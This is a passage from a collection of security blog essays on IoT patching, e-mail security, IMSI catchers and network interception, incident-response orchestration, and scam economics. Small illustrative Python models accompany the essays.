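    if domain in ("gmail.com", "googlemail.com"):
        local = local.replace(".", "").split("+")[0]
    return local + "@" + domain

a, b = "alice.smith@gmail.com", "alicesmith@gmail.com"
same_inbox = gmail_canonical(a) == gmail_canonical(b)  # one mailbox at Gmail
same_account_key = (a == b)                            # two "users" elsewhere
```

Both systems behave correctly in isolation; the insecurity lives entirely in the gap between their assumptions.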

It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn’t true for many of the embedded and low-cost Internet of things software packages. They’re designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn’t anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren’t patchable at all. Right now, if you own a digital video recorder that’s vulnerable to being recruited for a botnet—remember Mirai from 2016?—the only way to patch it is to throw it away and buy a new one.

Patching is starting to fail, which means that we’re losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it’s hard to see any other viable alternative.

Getting back to e-mail, the truth is that it’s incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated, and have been difficult to use properly the whole time. If we could start again, we would design something better and more user-friendly, but the huge number of legacy applications that use the existing standards mean that we can’t. I tell people who want to communicate securely with someone to use one of the secure messaging systems: Signal, Off-the-Record, or—if having one of those two on your system is itself suspicious—WhatsApp. Of course they’re not perfect, as last week’s announcement of a vulnerability (patched within hours) in Signal illustrates. And they’re not as flexible as e-mail, but that makes them easier to secure.

This essay previously appeared on Lawfare.com.

Posted on June 4, 2018 at 6:33 AM

Surveillance and Our Insecure Infrastructure

Since Edward Snowden revealed to the world the extent of the NSA’s global surveillance network, there has been a vigorous debate in the technological community about what its limits should be.

Less discussed is how many of these same surveillance techniques are used by other—smaller, poorer, and more totalitarian—countries to spy on political opponents, dissidents, human rights defenders, and the press; the Citizen Lab in Toronto has documented some of the many abuses, by countries like Ethiopia, the UAE, Iran, Syria, Kazakhstan, Sudan, Ecuador, Malaysia, and China.

That these countries can use network surveillance technologies to violate human rights is a shame on the world, and there’s a lot of blame to go around.

We can point to the governments that are using surveillance against their own citizens.

We can certainly blame the cyberweapons arms manufacturers that are selling those systems, and the countries—mostly European—that allow those arms manufacturers to sell those systems.

There’s a lot more the global Internet community could do to limit the availability of sophisticated Internet and telephony surveillance equipment to totalitarian governments. But I want to focus on another contributing cause to this problem: the fundamental insecurity of our digital systems that makes this a problem in the first place.

IMSI catchers are fake mobile phone towers. They allow someone to impersonate a cell network and collect information about phones in the vicinity of the device, and they’re used to create lists of people who were at a particular event or near a particular location.

Fundamentally, the technology works because the phone in your pocket automatically trusts any cell tower to which it connects. There’s no security in the connection protocols between the phones and the towers.
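A toy model makes the failure obvious. In the legacy protocols the handset proves itself to the network, but the network never proves itself to the handset, and the phone simply camps on the strongest signal it hears. Everything below is illustrative (made-up names and signal strengths), not real baseband behavior:

```python
# Toy model of why IMSI catchers work: the phone never checks whether a
# tower is legitimate; the loudest transmitter simply wins.

class Tower:
    def __init__(self, name, signal_dbm, legitimate):
        self.name = name
        self.signal_dbm = signal_dbm
        self.legitimate = legitimate

def camp_on(towers):
    # No legitimacy check anywhere in the selection logic.
    return max(towers, key=lambda t: t.signal_dbm)

towers = [
    Tower("carrier-macro-cell", -95, legitimate=True),
    Tower("imsi-catcher-in-a-van", -60, legitimate=False),  # closer, louder
]
chosen = camp_on(towers)   # the fake tower, simply because it is loudest
```

Fixing this means mutual authentication between phone and tower, which is exactly the kind of protocol change the rest of this essay argues for.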

IP intercept systems are used to eavesdrop on what people do on the Internet. Unlike the surveillance that happens at the sites you visit, by companies like Facebook and Google, this surveillance happens at the point where your computer connects to the Internet. Here, someone can eavesdrop on everything you do.

This system also exploits existing vulnerabilities in the underlying Internet communications protocols. Most of the traffic between your computer and the Internet is unencrypted, and what is encrypted is often vulnerable to man-in-the-middle attacks because of insecurities in both the Internet protocols and the encryption protocols that protect it.
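A stripped-down sketch of why this works: every hop on an unauthenticated, unencrypted path can read the traffic (passive interception) or rewrite it in flight (an active man-in-the-middle). The hop functions, account names, and request string below are purely illustrative, not real network code:

```python
# Toy model of traffic crossing an untrusted path: each hop sees the
# message and may transform it before passing it along.

def send_via(path_hops, message):
    for hop in path_hops:
        message = hop(message)
    return message

captured = []

def eavesdropping_hop(msg):
    captured.append(msg)   # passive interception: copy the plaintext
    return msg

def mitm_hop(msg):
    # Active man-in-the-middle: rewrite the request in flight.
    return msg.replace("account=alice", "account=mallory")

delivered = send_via([eavesdropping_hop, mitm_hop],
                     "GET /login?account=alice&pw=hunter2")
```

Encryption defeats the first hop and authentication defeats the second; without both, anyone on the path gets both capabilities for free.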

There are many other examples. What they all have in common is that they are vulnerabilities in our underlying digital communications systems that allow someone—whether it’s a country’s secret police, a rival national intelligence organization, or a criminal group—to break or bypass what security there is and spy on the users of these systems.

These insecurities exist for two reasons. First, they were designed in an era where computer hardware was expensive and inaccessibility was a reasonable proxy for security. When the mobile phone network was designed, faking a cell tower was an incredibly difficult technical exercise, and it was reasonable to assume that only legitimate cell providers would go to the effort of creating such towers.

At the same time, computers were less powerful and software was much slower, so adding security into the system seemed like a waste of resources. Fast forward to today: computers are cheap and software is fast, and what was impossible only a few decades ago is now easy.

The second reason is that governments use these surveillance capabilities for their own purposes. The FBI has used IMSI-catchers for years to investigate crimes. The NSA uses IP interception systems to collect foreign intelligence. Both of these agencies, as well as their counterparts in other countries, have put pressure on the standards bodies that create these systems to not implement strong security.

Of course, technology isn’t static. With time, things become cheaper and easier. What was once a secret NSA interception program or a secret FBI investigative tool becomes usable by less-capable governments and cybercriminals.

Man-in-the-middle attacks against Internet connections are a common criminal tool to steal credentials from users and hack their accounts.

IMSI-catchers are used by criminals, too. Right now, you can go onto Alibaba.com and buy your own IMSI catcher for under $2,000.

Despite their uses by democratic governments for legitimate purposes, our security would be much better served by fixing these vulnerabilities in our infrastructures.

These systems are not only used by dissidents in totalitarian countries, they’re also used by legislators, corporate executives, critical infrastructure providers, and many others in the US and elsewhere.

That we allow people to remain insecure and vulnerable is both wrongheaded and dangerous.

Earlier this month, two American legislators—Senator Ron Wyden and Rep. Ted Lieu—sent a letter to the chairman of the Federal Communications Commission, demanding that he do something about the country’s insecure telecommunications infrastructure.

They pointed out that not only are insecurities rampant in the underlying protocols and systems of the telecommunications infrastructure, but also that the FCC knows about these vulnerabilities and isn’t doing anything to force the telcos to fix them.

Wyden and Lieu make the point that fixing these vulnerabilities is a matter of US national security, but it’s also a matter of international human rights. All modern communications technologies are global, and anything the US does to improve its own security will also improve security worldwide.

Yes, it means that the FBI and the NSA will have a harder job spying, but it also means that the world will be a safer and more secure place.

This essay previously appeared on AlJazeera.com.

Posted on April 17, 2017 at 6:21 AM

Security Orchestration and Incident Response

Last month at the RSA Conference, I saw a lot of companies selling security incident response automation. Their promise was to replace people with computers—sometimes with the addition of machine learning or other artificial intelligence techniques—and to respond to attacks at computer speeds.

While this is a laudable goal, there’s a fundamental problem with doing this in the short term. You can only automate what you’re certain about, and there is still an enormous amount of uncertainty in cybersecurity. Automation has its place in incident response, but the focus needs to be on making the people effective, not on replacing them—security orchestration, not automation.

This isn’t just a choice of words—it’s a difference in philosophy. The US military went through this in the 1990s. What was called the Revolution in Military Affairs (RMA) was supposed to change how warfare was fought. Satellites, drones and battlefield sensors were supposed to give commanders unprecedented information about what was going on, while networked soldiers and weaponry would enable troops to coordinate to a degree never before possible. In short, the traditional fog of war would be replaced by perfect information, providing certainty instead of uncertainty. They, too, believed certainty would fuel automation and, in many circumstances, allow technology to replace people.

Of course, it didn’t work out that way. The US learned in Afghanistan and Iraq that there are a lot of holes in both its collection and coordination systems. Drones have their place, but they can’t replace ground troops. The advances from the RMA brought with them some enormous advantages, especially against militaries that didn’t have access to the same technologies, but never resulted in certainty. Uncertainty still rules the battlefield, and soldiers on the ground are still the only effective way to control a region of territory.

But along the way, we learned a lot about how the feeling of certainty affects military thinking. Last month, I attended a lecture on the topic by H.R. McMaster. This was before he became President Trump’s national security advisor-designate. Then, he was the director of the Army Capabilities Integration Center. His lecture touched on many topics, but at one point he talked about the failure of the RMA. He confirmed that military strategists mistakenly believed that data would give them certainty. But he took this change in thinking further, outlining the ways this belief in certainty had repercussions in how military strategists thought about modern conflict.

McMaster’s observations are directly relevant to Internet security incident response. We too have been led to believe that data will give us certainty, and we are making the same mistakes that the military did in the 1990s. In a world of uncertainty, there’s a premium on understanding, because commanders need to figure out what’s going on. In a world of certainty, knowing what’s going on becomes a simple matter of data collection.

I see this same fallacy in Internet security. Many companies exhibiting at the RSA Conference promised to collect and display more data and that the data will reveal everything. This simply isn’t true. Data does not equal information, and information does not equal understanding. We need data, but we also must prioritize understanding the data we have over collecting ever more data. Much like the problems with bulk surveillance, the “collect it all” approach provides minimal value over collecting the specific data that’s useful.

In a world of uncertainty, the focus is on execution. In a world of certainty, the focus is on planning. I see this manifesting in Internet security as well. My own Resilient Systems—now part of IBM Security—allows incident response teams to manage security incidents and intrusions. While the tool is useful for planning and testing, its real focus is always on execution.

Uncertainty demands initiative, while certainty demands synchronization. Here, again, we are heading too far down the wrong path. The purpose of all incident response tools should be to make the human responders more effective. They need both the initiative to act and the capability to exercise that initiative effectively.

When things are uncertain, you want your systems to be decentralized. When things are certain, centralization is more important. Good incident response teams know that decentralization goes hand in hand with initiative. And finally, a world of uncertainty prioritizes command, while a world of certainty prioritizes control. Again, effective incident response teams know this, and effective managers aren’t scared to release and delegate control.

Like the US military, we in the incident response field have shifted too much into the world of certainty. We have prioritized data collection, preplanning, synchronization, centralization and control. You can see it in the way people talk about the future of Internet security, and you can see it in the products and services offered on the show floor of the RSA Conference.

Automation, too, is rigid. Incident response needs to be dynamic and agile, because you are never certain and there is an adaptive, malicious adversary on the other end. You need a response system that has human controls and can modify itself on the fly. Automation just doesn’t allow a system to do that to the extent that’s needed in today’s environment. Just as the military shifted from trying to replace the soldier to making the best soldier possible, we need to do the same.

For some time, I have been talking about incident response in terms of OODA loops. This is a way of thinking about real-time adversarial relationships, originally developed for airplane dogfights, but much more broadly applicable. OODA stands for observe-orient-decide-act, and it’s what people responding to a cybersecurity incident do constantly, over and over again. We need tools that augment each of those four steps. These tools need to operate in a world of uncertainty, where there is never enough data to know everything that is going on. We need to prioritize understanding, execution, initiative, decentralization and command.
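As a minimal sketch of that structure, an OODA-style loop is just four pluggable steps run until the incident is resolved; the point of good tooling is to augment each step, not to hard-code it. The handlers below are toy stand-ins for telemetry feeds, analyst judgment, and playbook actions:

```python
# A minimal OODA (observe-orient-decide-act) loop for incident response.
# Everything after the loop itself is an illustrative toy scenario.

def ooda_loop(observe, orient, decide, act, done, state=None):
    while not done(state):
        data = observe()               # observe: pull in fresh telemetry
        picture = orient(data, state)  # orient: build an understanding
        action = decide(picture)       # decide: pick a response
        state = act(action, state)     # act: execute and update state
    return state

# Toy scenario: alerts arrive in waves until the incident quiets down.
alerts = iter([["scan"], ["scan", "exfil"], []])
observe = lambda: next(alerts)
orient = lambda data, state: {"threats": data}
decide = lambda picture: "block" if picture["threats"] else "stand-down"
act = lambda action, state: (state or []) + [action]
done = lambda state: state is not None and state[-1] == "stand-down"

history = ooda_loop(observe, orient, decide, act, done)
```

Note that each step is a hook for humans and tools together; nothing in the loop requires that any single step be fully automated.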

At the same time, we’re going to have to make all of this scale. If anything, the most seductive promise of a world of certainty and automation is that it allows defense to scale. The problem is that we’re not there yet. We can automate and scale parts of IT security, such as antivirus, automatic patching and firewall management, but we can’t yet scale incident response. We still need people. And we need to understand what can be automated and what can’t be.

The word I prefer is orchestration. Security orchestration represents the union of people, process and technology. It’s computer automation where it works, and human coordination where that’s necessary. It’s networked systems giving people understanding and capabilities for execution. It’s making those on the front lines of incident response the most effective they can be, instead of trying to replace them. It’s the best approach we have for cyberdefense.

Automation has its place. If you think about the product categories where it has worked, they’re all areas where we have pretty strong certainty. Automation works in antivirus, firewalls, patch management and authentication systems. None of them is perfect, but all those systems are right almost all the time, and we’ve developed ancillary systems to deal with it when they’re wrong.

Automation fails in incident response because there’s too much uncertainty. Actions can be automated once the people understand what’s going on, but people are still required. For example, IBM’s Watson for Cyber Security provides insights for incident response teams based on its ability to ingest and find patterns in an enormous amount of freeform data. It does not attempt a level of understanding necessary to take people out of the equation.

From within an orchestration model, automation can be incredibly powerful. But it’s the human-centric orchestration model—the dashboards, the reports, the collaboration—that makes automation work. Otherwise, you’re blindly trusting the machine. And when an uncertain process is automated, the results can be dangerous.

Technology continues to advance, and this is all a changing target. Eventually, computers will become intelligent enough to replace people at real-time incident response. My guess, though, is that computers are not going to get there by collecting enough data to be certain. More likely, they’ll develop the ability to exhibit understanding and operate in a world of uncertainty. That’s a much harder goal.

Yes, today, this is all science fiction. But it’s not stupid science fiction, and it might become reality during the lifetimes of our children. Until then, we need people in the loop. Orchestration is a way to achieve that.

This essay previously appeared on the Security Intelligence blog.

Posted on March 29, 2017 at 6:16 AM

Far-Fetched Scams Separate the Gullible from Everyone Else

Interesting conclusion by Cormac Herley, in this paper: “Why Do Nigerian Scammers Say They are From Nigeria?”

Abstract: False positives cause many promising detection technologies to be unworkable in practice. Attackers, we show, face this problem too. In deciding who to attack true positives are targets successfully attacked, while false positives are those that are attacked but yield nothing. This allows us to view the attacker’s problem as a binary classification. The most profitable strategy requires accurately distinguishing viable from non-viable users, and balancing the relative costs of true and false positives. We show that as victim density decreases the fraction of viable users that can be profitably attacked drops dramatically. For example, a 10x reduction in density can produce a 1000x reduction in the number of victims found. At very low victim densities the attacker faces a seemingly intractable Catch-22: unless he can distinguish viable from non-viable users with great accuracy the attacker cannot find enough victims to be profitable. However, only by finding large numbers of victims can he learn how to accurately distinguish the two.

Finally, this approach suggests an answer to the question in the title. Far-fetched tales of West African riches strike most as comical. Our analysis suggests that is an advantage to the attacker, not a disadvantage. Since his attack has a low density of victims the Nigerian scammer has an over-riding need to reduce false positives. By sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.
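Herley’s density argument can be reproduced numerically. In the sketch below, viable and non-viable users get classifier scores from two overlapping distributions, the attacker attacks everyone above the profit-maximizing threshold, and the number of victims found falls much faster than linearly as victim density drops. The Gaussian score model and all parameters are my illustrative assumptions, not the paper’s exact setup:

```python
# Numeric sketch of the victim-density argument. Viable users' scores are
# drawn from N(separation, 1), non-viable users' from N(0, 1); the attacker
# scans thresholds and attacks everyone above the most profitable one.
from math import erf, sqrt

def normal_cdf(x):
    return 0.5 * (1 + erf(x / sqrt(2)))

def victims_found(d, gain=100.0, cost=1.0, separation=1.5):
    best_profit, best_victims = 0.0, 0.0
    for i in range(400):                      # thresholds from -4 to +6
        t = -4 + i * 0.025
        tpr = 1 - normal_cdf(t - separation)  # viable users attacked
        fpr = 1 - normal_cdf(t)               # non-viable users attacked
        attacked = d * tpr + (1 - d) * fpr
        profit = d * tpr * gain - attacked * cost
        if profit > best_profit:
            best_profit, best_victims = profit, d * tpr
    return best_victims

hi = victims_found(1e-2)   # victim density 1%
lo = victims_found(1e-3)   # 10x lower density
# With these parameters, 10x less density costs far more than 10x the victims.
```

The exact multiplier depends on the chosen parameters, but the superlinear collapse is robust: as density falls, the optimal threshold rises, so the attacker gives up most viable victims just to keep false positives affordable. That is exactly the pressure that makes self-selecting, far-fetched bait attractive.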

Posted on June 21, 2012 at 1:03 PM
